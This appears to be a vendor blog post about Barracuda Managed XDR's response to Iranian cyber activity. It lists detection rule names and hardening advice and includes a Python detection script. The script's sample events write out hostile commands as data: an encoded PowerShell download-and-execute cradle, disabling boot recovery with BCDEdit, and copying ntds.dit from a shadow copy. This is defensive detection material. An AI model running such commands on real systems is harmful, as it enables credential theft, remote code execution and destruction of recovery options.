How Managed XDR helps MSPs stay ahead of heightened cyber activity

Just before the start of the conflict in the Middle East, Barracuda Managed XDR’s global Security Operations Center (SOC) observed a sharp surge in cyber activity—specifically, a ten‑fold increase in malicious traffic coming from Iran and targeting the United States.

To stay ahead of these elevated risks, the Managed XDR SOC team is operating in a heightened alert posture, delivering continuous threat monitoring and proactive threat hunting on behalf of our MSP partners and their customers.

What MSPs need to know

The SOC team is continuously tracking how the threat landscape is shifting and is layering additional protections as new intelligence emerges.

The team is actively integrating verified malicious indicators—domains, IP addresses, URLs, and more—tied to Iranian cyber activity into the Barracuda threat intelligence platform. This platform already contains roughly 14 billion indicators of compromise, including new intelligence associated with the current Middle East conflict.

As new threats are identified, customer environments are immediately scanned.

In addition, the security rules and detections for Barracuda Managed XDR Endpoint Security are continuously being updated. If your customers use managed Endpoint Security (with SentinelOne), now is a great time to ensure Platform Detection Library rules are activated to maximize coverage and protection.

Threat categories & key detections

These rules are actively helping MSPs protect customers from threats associated with Iranian cyber groups and related activity:

MuddyWater

  • Possible MuddyWater DLL Drop Consistent with Audio Driver Sideloading
    Detects DLL drops associated with MuddyWater espionage tactics.

Credential dumping

  • Suspicious Task Creation for Credential Harvesting
  • Python-Based Network Exploitation Tool
  • Potential LSASS Dumping Tools
  • Credential Dumping via Shadow Copy
  • Interactive NTDS Harvesting via VSS
  • Cached Domain Credential Dumping (cmdkey.exe)

Tunneling & remote access

  • Ngrok Domain Contacted
  • Cloudflare Persistent Tunnel Establishment Detected
  • Anomalous Process Initiating Cloudflare Tunnel Traffic

Collection & exfiltration

  • Keylogging Script via PowerShell
  • Chromium Browser Info Stealer via Remote Debugging
  • Browser Credential and Cookie Data Access Attempt

PowerShell / script abuse

  • PowerShell Script Execution via Time‑Based IPv4
  • Suspicious Usage of .NET Reflection via PowerShell
  • Encoded PowerShell Launching Command Line Download

Defense evasion, discovery & impact

  • Potential DLL Sideloading in PerfLogs Directory
  • Disk Data Wipe Attempt via dd Utility
  • Boot Configuration Tampering via BCDEdit
  • BloodHound Active Directory Reconnaissance File Creation
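To illustrate the kind of process-creation logic behind several of the detection names above, here is an added Python example (not Barracuda's or SentinelOne's own rules, whose logic is not published on this page). It decodes `-EncodedCommand` payloads to look for download primitives and applies simple command-line patterns for the BCDEdit, cmdkey and NTDS-via-shadow-copy categories; the Sysmon-style sample events, paths and patterns are constructed assumptions.

```python
import base64
import re

# Download primitives to look for once the encoded PowerShell payload is decoded.
DOWNLOAD_CMDLETS = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer", re.I)
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_ARG = re.compile(r"-e\w*\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_powershell(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE text), or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None

# Command-line rules: rule name -> (required image name or None for any image, pattern).
RULES = {
    "Boot Configuration Tampering via BCDEdit": ("bcdedit.exe", re.compile(r"recoveryenabled|bootstatuspolicy", re.I)),
    "Cached Domain Credential Dumping (cmdkey.exe)": ("cmdkey.exe", re.compile(r"/list", re.I)),
    "Interactive NTDS Harvesting via VSS": (None, re.compile(r"HarddiskVolumeShadowCopy.*ntds\.dit", re.I)),
}

def triage(events):
    """Return [(rule_name, command_line)] for every (image_path, command_line) event that matches."""
    hits = []
    for image, cmdline in events:
        img = image.lower().rsplit("\\", 1)[-1]
        if img in ("powershell.exe", "pwsh.exe"):
            decoded = decode_encoded_powershell(cmdline)
            if decoded and DOWNLOAD_CMDLETS.search(decoded):
                hits.append(("Encoded PowerShell Launching Command Line Download", cmdline))
        for name, (want_image, pattern) in RULES.items():
            if (want_image is None or img == want_image) and pattern.search(cmdline):
                hits.append((name, cmdline))
    return hits

def _enc(ps):  # builds the constructed encoded samples so no base64 is hand-typed
    return base64.b64encode(ps.encode("utf-16-le")).decode()

# Constructed Sysmon Event ID 1 style samples (image path, command line); not real telemetry.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -nop -w hidden -enc " + _enc("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')")),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -enc " + _enc("Get-Date")),                     # encoded but benign: no hit
    (r"C:\Windows\System32\bcdedit.exe", "bcdedit /set {default} recoveryenabled No"),
    (r"C:\Windows\System32\cmdkey.exe", "cmdkey /list"),
    (r"C:\Windows\System32\cmd.exe",
     r"cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\temp\ntds.dit"),
    (r"C:\Windows\System32\vssadmin.exe", "vssadmin list shadows"),   # routine backup admin: no hit
]

if __name__ == "__main__":
    for name, cl in triage(SAMPLE_EVENTS):
        print(f"[{name}] {cl}")
```

Decoding the payload before matching is what separates this from a bare `-enc` alert: the benign encoded `Get-Date` produces no hit, while the same flag wrapping a download primitive does.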

Practical security measures for all organizations

While Barracuda Managed XDR delivers deep, 24/7 cyber resilience, MSPs can further strengthen protection with the following best practices during periods of elevated geopolitical risk.

Network security

  • Implement country‑level blocking for geographies where the business does not operate.
  • Disable public‑facing RDP, enforce multifactor authentication, and monitor for unusual login patterns. Lock accounts after 3–5 failed attempts.
  • Replace direct RDP access with virtual desktop infrastructure (VDI) where possible.
  • Disable unused remote access ports.
  • Apply network segmentation to limit lateral movement.
  • Use privileged access workstations (PAWs) for administrative tasks.

Firewall settings

  • Review all inbound/outbound rules.
  • Remove any “permit any” rules.
  • Document and justify all external access.
  • Closely review rules allowing access from foreign IP ranges.

Password policies

  • Enforce 14‑character passwords with full complexity.
  • Prevent password reuse and consider 60–90 day rotation windows.

Additional essential measures

  • Prioritize software updates.
  • Remove unauthorized or unnecessary apps from corporate devices.
  • Pay special attention to remote access tools like TeamViewer and AnyDesk.
  • Audit legitimate admin tools (PsExec, PowerShell ISE) for potential misuse.
  • Ensure backups are isolated, tested, and include offline copies.
  • Review and update the organization’s incident response plan.

For further assistance, reach out to the Barracuda Managed XDR team to see how they can help.

This post originally appeared on Smarter MSP.